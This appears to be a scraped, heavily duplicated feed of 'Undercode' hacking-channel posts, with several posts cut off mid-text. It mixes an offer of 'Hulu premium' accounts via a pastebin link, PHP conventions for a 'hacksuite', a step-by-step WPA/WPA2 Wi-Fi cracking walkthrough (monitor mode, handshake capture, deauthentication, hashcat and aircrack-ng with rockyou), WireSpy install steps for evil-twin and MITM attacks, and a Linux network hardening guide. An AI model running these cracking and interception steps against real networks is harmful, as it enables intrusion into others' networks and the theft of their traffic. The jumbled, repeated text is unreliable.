π¦X56 HULU PREMIUMβ
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦So you want to build your own tools ?
That's great!
1) tabs: please use tabs instead of align code with spaces, tabs are much more flexible in order to make modifications in code, is program
independent(some programs will remove spaces) and is better readable.
2) context: if you have settings or anything else you want to make available for later use, you can make use of the context array: $_CONTEXT
This is an array, so make sure the key doesn't exist, if you're not sure if the key has been set, just dump the context array in your script:
> var_export($_CONTEXT);
paths: if you want to make shortcuts to (http) files you can add them to $_PATHS which contains the paths(basically shortcuts) and is also an array.
Again if you want to add new items to this array, make sure they aren't defined in your script:
var_export($_PATHS);
3) buffer output: unless you are building a hacksuite app or you're using the hacksuite in order to feed your application, you must buffer the output in $sCode until the script ends
4) functions: use the functions of folder Functions as much as possible, rather than creating new functions folder consistency: always make sure that you put new files into folders that make sense
variable naming: you're not exactly forced to do this but since most in the suite is coded like this it's recommended to follow the structure below.
> boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject
5) As you can see this makes the code better readable and you can find out right away what type the variable contains.
Protect include files
You also need to protect your include files from being accessed directly. You can do this by simply checking if the constant IN_SCRIPT has been defined.
if(!defined('IN_SCRIPT')){
exit;
}
6) You can put this code at the start of the code in all of your include files.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β
π¦So you want to build your own tools ?
That's great!
1) tabs: please use tabs instead of align code with spaces, tabs are much more flexible in order to make modifications in code, is program
independent(some programs will remove spaces) and is better readable.
2) context: if you have settings or anything else you want to make available for later use, you can make use of the context array: $_CONTEXT
This is an array, so make sure the key doesn't exist, if you're not sure if the key has been set, just dump the context array in your script:
> var_export($_CONTEXT);
paths: if you want to make shortcuts to (http) files you can add them to $_PATHS which contains the paths(basically shortcuts) and is also an array.
Again if you want to add new items to this array, make sure they aren't defined in your script:
var_export($_PATHS);
3) buffer output: unless you are building a hacksuite app or you're using the hacksuite in order to feed your application, you must buffer the output in $sCode until the script ends
4) functions: use the functions of folder Functions as much as possible, rather than creating new functions folder consistency: always make sure that you put new files into folders that make sense
variable naming: you're not exactly forced to do this but since most in the suite is coded like this it's recommended to follow the structure below.
> boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject
5) As you can see this makes the code better readable and you can find out right away what type the variable contains.
Protect include files
You also need to protect your include files from being accessed directly. You can do this by simply checking if the constant IN_SCRIPT has been defined.
if(!defined('IN_SCRIPT')){
exit;
}
6) You can put this code at the start of the code in all of your include files.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi topic article on git :
1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:
> airmon-ng
2) If you do not see an interface listed then your wireless card does not support monitor mode
3)this will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
> airmon-ng start wlan0
4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
5) Find Your Target
6) Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
7) You should see output similar to what is below.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.
9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
10) 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
π¦Hack wifi topic article on git :
1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:
> airmon-ng
2) If you do not see an interface listed then your wireless card does not support monitor mode
3)this will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
> airmon-ng start wlan0
4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
5) Find Your Target
6) Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
7) You should see output similar to what is below.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.
9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
10) 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
13) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
15) Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
> cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
17) git clone https://github.com/brannondorsey/naive-hashcat
18) cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
19) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
20) Where the last two fields separated by : are the network name and password respectively.
21) If you would like to use hashcat without naive-hashcat see this page for info.
Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
21) # download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
π¦Example :Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
mv ./-01.cap hackme.cap
14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
15) Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
> cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
17) git clone https://github.com/brannondorsey/naive-hashcat
18) cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
19) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
20) Where the last two fields separated by : are the network name and password respectively.
21) If you would like to use hashcat without naive-hashcat see this page for info.
Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
21) # download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
π¦Example :Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat cap2hccapx - advanced password recovery
CAP-to-HCCAPX online converter page for WPA/WPA2
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi git topic :
> WireSpy enables the automation of various WiFi attacks to conduct Man-In-The-Middle-Attacks (MITMAs).
π¦FEATURES :
1-Capture victims' traffic.
2-MAC address spoofing.
3-Set-up honeypot and evil twin attacks.
4-Show the list of in range access points.
5-Wireless adapter|card|dongle power amplification.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) $ chmod +x wirespy.sh
4) Run the script with root privileges:
$ sudo ./wirespy.sh
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi git topic :
> WireSpy enables the automation of various WiFi attacks to conduct Man-In-The-Middle-Attacks (MITMAs).
π¦FEATURES :
1-Capture victims' traffic.
2-MAC address spoofing.
3-Set-up honeypot and evil twin attacks.
4-Show the list of in range access points.
5-Wireless adapter|card|dongle power amplification.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½
1) git clone https://github.com/aress31/wirespy
2) cd wirespy
3) $ chmod +x wirespy.sh
4) Run the script with root privileges:
$ sudo ./wirespy.sh
β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - aress31/wirespy: Framework designed to automate various wireless networks attacks (the project was presented on Pentesterβ¦
Framework designed to automate various wireless networks attacks (the project was presented on Pentester Academy TV's toolbox in 2017). - aress31/wirespy
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Speed ββoptimization-Detailed network configuration file for tuning the performance of LINUX network by undercode :
1) In "Debugging Tools for Tuning Linux Network Performance", we introduced route , Netstat, tcpdump three network tuning test tools and their achievable functions. In this article, we will focus on the contents of the network configuration files to help you understand these files.
/etc/modules.conf file
2) This configuration file defines the parameter information of various modules that need to be loaded at startup. Here we mainly focus on the configuration of the network card. In order to reduce the problems that may occur during startup, the Linux kernel will not automatically detect multiple network cards. For a system that does not compile the driver of the network card into the kernel but dynamically loads it as a module, if multiple network cards need to be installed, the corresponding configuration should be made in the "modules.conf" file. If the device driver is compiled as a module (kernel module): for PCI devices, the module will automatically detect all devices that have been installed on the system; for ISA cards, you need to provide the module with an IO address so that the module knows where Look for the card, the information is provided in "/etc/conf.modules".
3) For example, we have two 3c509 cards with ISA bus, one IO address is 0x300 and the other is 0x320. Edit the "modules.conf" file as follows:
alias eth0 3c509
alias eth1 3c509
options 3c509 io=0x300,0x320
4) For PCI cards, you only need the alias command to associate ethN with the appropriate driver module name, and the IO address of the PCI card will be automatically Detected. For PCI cards, edit the "modules.conf" file as follows:
alias eth0 3c905
alias eth1 3c905
5) If the driver has been compiled into the kernel: the PCI detection program at system startup will automatically find all related network cards. The ISA card can also be automatically detected, but in some cases, the ISA card still needs to do the following configuration work: add configuration information in "/etc/lilo.conf", the method is to start the parameters through the LILO program The information is passed to the kernel. For the ISA card, edit the "lilo.conf" file and add the following content:
append=" ether="0,0,eth0 ether="0,0,eth1"
/etc/sysconfig/network-scripts/ifcfg-ethN file
6) in In RedHat, the configuration file of the system network device is saved in "/etc/sysconfig/network-scripts" In the directory, ifcfg-eth0 contains the configuration information of the first network card, ifcfg-eth1 contains the configuration information of the second network card, etc. If you want to manually modify the network address or add a new network interface on a new interface, you can modify the corresponding File (ifcfg-ethN) or create a new file to achieve.
DEVICE=name name indicates the name of the physical device
IPADDR=addr addr indicates the IP address assigned to the card
NETMASK=mask mask indicates the network mask
NETWORK=addr addr indicates the network address
BROADCAST=addr addr indicates the broadcast address
ONBOOT=yes/no Whether to activate the card
none: no need to start the protocol
bootp: use bootp protocol
dhcp: Use dhcp protocol
USERCTL=yes/no to allow non-root users to control the device
/etc/resolv.conf file
7) This file is a configuration file used by a domain name resolver (resolver, a library that resolves IP addresses based on host name), Examples are as follows:
search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2
8) "search domainname.com" means that when a host name that does not include a full domain name is provided, add the suffix of domainname.com after the host name; "nameserver" Indicates that the host specified by this address is the domain name server when resolving the domain name. The domain name server is queried in the order of appearance in the file.
/etc/host.conf file
π¦Speed ββoptimization-Detailed network configuration file for tuning the performance of LINUX network by undercode :
1) In "Debugging Tools for Tuning Linux Network Performance", we introduced route , Netstat, tcpdump three network tuning test tools and their achievable functions. In this article, we will focus on the contents of the network configuration files to help you understand these files.
/etc/modules.conf file
2) This configuration file defines the parameter information of various modules that need to be loaded at startup. Here we mainly focus on the configuration of the network card. In order to reduce the problems that may occur during startup, the Linux kernel will not automatically detect multiple network cards. For a system that does not compile the driver of the network card into the kernel but dynamically loads it as a module, if multiple network cards need to be installed, the corresponding configuration should be made in the "modules.conf" file. If the device driver is compiled as a module (kernel module): for PCI devices, the module will automatically detect all devices that have been installed on the system; for ISA cards, you need to provide the module with an IO address so that the module knows where Look for the card, the information is provided in "/etc/conf.modules".
3) For example, we have two 3c509 cards with ISA bus, one IO address is 0x300 and the other is 0x320. Edit the "modules.conf" file as follows:
alias eth0 3c509
alias eth1 3c509
options 3c509 io=0x300,0x320
4) For PCI cards, you only need the alias command to associate ethN with the appropriate driver module name, and the IO address of the PCI card will be automatically Detected. For PCI cards, edit the "modules.conf" file as follows:
alias eth0 3c905
alias eth1 3c905
5) If the driver has been compiled into the kernel: the PCI detection program at system startup will automatically find all related network cards. The ISA card can also be automatically detected, but in some cases, the ISA card still needs to do the following configuration work: add configuration information in "/etc/lilo.conf", the method is to start the parameters through the LILO program The information is passed to the kernel. For the ISA card, edit the "lilo.conf" file and add the following content:
append=" ether="0,0,eth0 ether="0,0,eth1"
/etc/sysconfig/network-scripts/ifcfg-ethN file
6) in In RedHat, the configuration file of the system network device is saved in "/etc/sysconfig/network-scripts" In the directory, ifcfg-eth0 contains the configuration information of the first network card, ifcfg-eth1 contains the configuration information of the second network card, etc. If you want to manually modify the network address or add a new network interface on a new interface, you can modify the corresponding File (ifcfg-ethN) or create a new file to achieve.
DEVICE=name name indicates the name of the physical device
IPADDR=addr addr indicates the IP address assigned to the card
NETMASK=mask mask indicates the network mask
NETWORK=addr addr indicates the network address
BROADCAST=addr addr indicates the broadcast address
ONBOOT=yes/no Whether to activate the card
none: no need to start the protocol
bootp: use bootp protocol
dhcp: Use dhcp protocol
USERCTL=yes/no to allow non-root users to control the device
/etc/resolv.conf file
7) This file is a configuration file used by a domain name resolver (resolver, a library that resolves IP addresses based on host name), Examples are as follows:
search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2
8) "search domainname.com" means that when a host name that does not include a full domain name is provided, add the suffix of domainname.com after the host name; "nameserver" Indicates that the host specified by this address is the domain name server when resolving the domain name. The domain name server is queried in the order of appearance in the file.
/etc/host.conf file
9) This file specifies how to resolve the host name. Linux uses the parser library to obtain the IP address corresponding to the host name. The following is an example of "/etc/host.conf":
order bind, hosts
γγmulti on
γγospoof on
10) "order bind, hosts" specifies the order of the host name query, here it is specified that DNS is used to resolve the domain name, and then query "/etc/ hosts" file (or vice versa).
"Multi on" specifies whether the host specified in the "/etc/hosts" file can have multiple addresses, and hosts with multiple IP addresses are generally called multi-hole hosts.
"Nospoof on" means that IP address spoofing of the server is not allowed. IP spoofing is a means of attacking the security of the system, by disguising the IP address as another computer to gain the trust of other computers.
/etc/hosts file
11) When the machine starts, before the DNS can be queried, the machine needs to look up some host name to IP address matches. The matching information is stored in the /etc/hosts file. In the absence of a domain name server, all network programs on the system resolve the IP address corresponding to a host name by querying the file.
The following is an example of the "/etc/hosts" file:
γγIP Address Hostname Alias
γγ127.0.0.1 Localhost Gate.openarch.com
γγ208.164.186.1 gate.openarch.com Gate
γγ..........................................
The leftmost column is Host IP information, the middle column is the host name. Any subsequent columns are aliases for that host. Once the network configuration file of the machine is configured, the network should be restarted for the modification to take effect. Use the following command to restart the network: /etc/rc.d/init.d/network restart.
/etc/inetd.conf file
12) As we all know, as a server, the more service ports are opened, the more difficult it is to guarantee the security and stability of the system. Therefore, the server that provides specific services should open the ports necessary to provide the service as much as possible, and close the services that are not related to the server service. For example: a machine that is a www and ftp server should only open ports 80 and 25, and Other unrelated services such as finger auth and other services are turned off to reduce system vulnerabilities.
13) Inetd, also known as a "super server", is a daemon that monitors some network requests. It calls corresponding service processes to process connection requests based on network requests. inetd.conf is the configuration file of inetd. The inetd.conf file tells inetd which network ports to monitor and which services to start for each port. When using Linux in any network environment, the first thing to do is to understand what services the server will provide. Those services that are not needed should be banned, and it is best to uninstall them, so that hackers will have fewer opportunities to attack the system. Check the "/etc/inetd.conf" file to see what services inetd provides. Use the method of adding a comment (add a # at the beginning of a line) to prohibit any unnecessary services, and then send a SIGHUP signal to the inetd process:
Step 1: Change the file permissions to 600.
[root@deep]# chmod 600 /etc/inetd.conf
Β· Step 2: Make sure that the owner of the file is root.
γ
[root@deep]# stat /etc/inetd.conf
Β· Step 3: Edit the "inetd.conf" file (vi /etc/inetd.conf) to prohibit all unnecessary services, such as: ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, etc. If you think certain services are useful, you can not ban them.
Β· Step 4: After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.
γ[root@deep /root]# killall -HUP inetd
Β· Step 5: In order to ensure the security of the "inetd.conf" file, you can use chattr command to make it unchangeable. To make the file unchangeable, just use the following command:
[root@deep]# chattr +i /etc/inetd.conf The
order bind, hosts
γγmulti on
γγospoof on
10) "order bind, hosts" specifies the order of the host name query, here it is specified that DNS is used to resolve the domain name, and then query "/etc/ hosts" file (or vice versa).
"Multi on" specifies whether the host specified in the "/etc/hosts" file can have multiple addresses, and hosts with multiple IP addresses are generally called multi-hole hosts.
"Nospoof on" means that IP address spoofing of the server is not allowed. IP spoofing is a means of attacking the security of the system, by disguising the IP address as another computer to gain the trust of other computers.
/etc/hosts file
11) When the machine starts, before the DNS can be queried, the machine needs to look up some host name to IP address matches. The matching information is stored in the /etc/hosts file. In the absence of a domain name server, all network programs on the system resolve the IP address corresponding to a host name by querying the file.
The following is an example of the "/etc/hosts" file:
γγIP Address Hostname Alias
γγ127.0.0.1 Localhost Gate.openarch.com
γγ208.164.186.1 gate.openarch.com Gate
γγ..........................................
The leftmost column is Host IP information, the middle column is the host name. Any subsequent columns are aliases for that host. Once the network configuration file of the machine is configured, the network should be restarted for the modification to take effect. Use the following command to restart the network: /etc/rc.d/init.d/network restart.
/etc/inetd.conf file
12) As we all know, as a server, the more service ports are opened, the more difficult it is to guarantee the security and stability of the system. Therefore, the server that provides specific services should open the ports necessary to provide the service as much as possible, and close the services that are not related to the server service. For example: a machine that is a www and ftp server should only open ports 80 and 25, and Other unrelated services such as finger auth and other services are turned off to reduce system vulnerabilities.
13) Inetd, also known as a "super server", is a daemon that monitors some network requests. It calls corresponding service processes to process connection requests based on network requests. inetd.conf is the configuration file of inetd. The inetd.conf file tells inetd which network ports to monitor and which services to start for each port. When using Linux in any network environment, the first thing to do is to understand what services the server will provide. Those services that are not needed should be banned, and it is best to uninstall them, so that hackers will have fewer opportunities to attack the system. Check the "/etc/inetd.conf" file to see what services inetd provides. Use the method of adding a comment (add a # at the beginning of a line) to prohibit any unnecessary services, and then send a SIGHUP signal to the inetd process:
Step 1: Change the file permissions to 600.
[root@deep]# chmod 600 /etc/inetd.conf
Β· Step 2: Make sure that the owner of the file is root.
γ
[root@deep]# stat /etc/inetd.conf
Β· Step 3: Edit the "inetd.conf" file (vi /etc/inetd.conf) to prohibit all unnecessary services, such as: ftp, telnet, shell, login, exec, talk, ntalk, imap, pop-2, pop-3, finger, auth, etc. If you think certain services are useful, you can not ban them.
Β· Step 4: After changing the "inetd.conf" file, don't forget to send a SIGHUP signal (killall -HUP inetd) to the inetd process.
γ[root@deep /root]# killall -HUP inetd
Β· Step 5: In order to ensure the security of the "inetd.conf" file, you can use chattr command to make it unchangeable. To make the file unchangeable, just use the following command:
[root@deep]# chattr +i /etc/inetd.conf The
"i" attribute file cannot be changed: it cannot be deleted or renamed, and this file cannot be created Cannot write data to this file. Only the system administrator can set and clear this attribute. If you want to change the inetd.conf file, you must first clear the flag that does not allow changes:
[root@deep]# chattr -i /etc/inetd.conf
but for things like sendmail, Named, www and other services, because they are not like finger, telnet and other services, when the request comes, the inet daemon starts the corresponding process to provide services, but runs as a daemon when the system starts. For redhat linux, a linuxconfig command is provided, through which you can interactively set whether to run related services at startup under the graphical interface. You can also use commands to set whether to start a service at startup, such as: [root@deep]# chkconfig -level 35 named off.
/etc/hosts.allow file
However, if telnet, ftp and other services are shut down together, it is very inconvenient for the administrator to need remote management. Linux provides another more flexible and effective method to limit the service request users, so that on the basis of ensuring security, trusted users can use various services. Linux provides a program called TCP wrapper. This program is installed by default in most releases. With TCP wrapper you can restrict access to certain services mentioned earlier. And the TCP wrapper log file records all attempts to access your system. By viewing the log of the program through the last command, the administrator can know who has or attempted to connect to your system.
In the /etc directory, there are two files: hosts.deny hosts.allow By configuring these two files, you can specify which machines can use these services and which can not use these services.
/etc/services file
The correspondence between port numbers and standard services is defined in detail in RFC 1700 "Assigned Numbers". The "/etc/services" file enables the server and client programs to convert the name of the service into a port number. This table exists on every host and its file name is "/etc/services". Only the "root" user has the authority to modify this file, and under normal circumstances this file is not necessary to modify, because this file already contains the port number corresponding to the commonly used services. In order to improve security, we can add protection to this file to avoid unauthorized deletion and change. To protect this file, use the following command:
[root@deep]# chattr +i /etc/services
/etc/securetty file The
"/etc/securetty" file allows you to specify that the "root" user can log in from that TTY device. The login program (usually "/bin/login") needs to read the "/etc/securetty" file. Its format is: the listed tty devices are allowed to log in, and comments or those that do not exist in this file do not allow root login.
/etc/inittab file
Comment out a line in the file to disable Control-Alt-Delete from shutting down the computer. If the server is not placed in a safe place, this is very important.
Edit the inittab file (vi /etc/inittab) and change this line:
γca::ctrlaltdel:/sbin/shutdown -t3 -r now
to:
#ca::ctrlaltdel:/sbin/shutdown -t3 -r now
Use the following command to make the changes take effect:
[root@deep]# /sbin/init q
/etc/rc.d/init.d/
/etc/rc. The script under d/init.d/ mainly contains the script program to start the service. There is no need for the average user to know the contents of the script file. So the permissions of these script files should be changed.
γγ[root@deep]# chmod -R 700 /etc/rc.d/init.d/*
This way, only root can read, write, and execute scripts in this directory.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
[root@deep]# chattr -i /etc/inetd.conf
but for things like sendmail, Named, www and other services, because they are not like finger, telnet and other services, when the request comes, the inet daemon starts the corresponding process to provide services, but runs as a daemon when the system starts. For redhat linux, a linuxconfig command is provided, through which you can interactively set whether to run related services at startup under the graphical interface. You can also use commands to set whether to start a service at startup, such as: [root@deep]# chkconfig -level 35 named off.
/etc/hosts.allow file
However, if telnet, ftp and other services are shut down together, it is very inconvenient for the administrator to need remote management. Linux provides another more flexible and effective method to limit the service request users, so that on the basis of ensuring security, trusted users can use various services. Linux provides a program called TCP wrapper. This program is installed by default in most releases. With TCP wrapper you can restrict access to certain services mentioned earlier. And the TCP wrapper log file records all attempts to access your system. By viewing the log of the program through the last command, the administrator can know who has or attempted to connect to your system.
In the /etc directory, there are two files: hosts.deny hosts.allow By configuring these two files, you can specify which machines can use these services and which can not use these services.
/etc/services file
The correspondence between port numbers and standard services is defined in detail in RFC 1700 "Assigned Numbers". The "/etc/services" file enables the server and client programs to convert the name of the service into a port number. This table exists on every host and its file name is "/etc/services". Only the "root" user has the authority to modify this file, and under normal circumstances this file is not necessary to modify, because this file already contains the port number corresponding to the commonly used services. In order to improve security, we can add protection to this file to avoid unauthorized deletion and change. To protect this file, use the following command:
[root@deep]# chattr +i /etc/services
/etc/securetty file The
"/etc/securetty" file allows you to specify that the "root" user can log in from that TTY device. The login program (usually "/bin/login") needs to read the "/etc/securetty" file. Its format is: the listed tty devices are allowed to log in, and comments or those that do not exist in this file do not allow root login.
/etc/inittab file
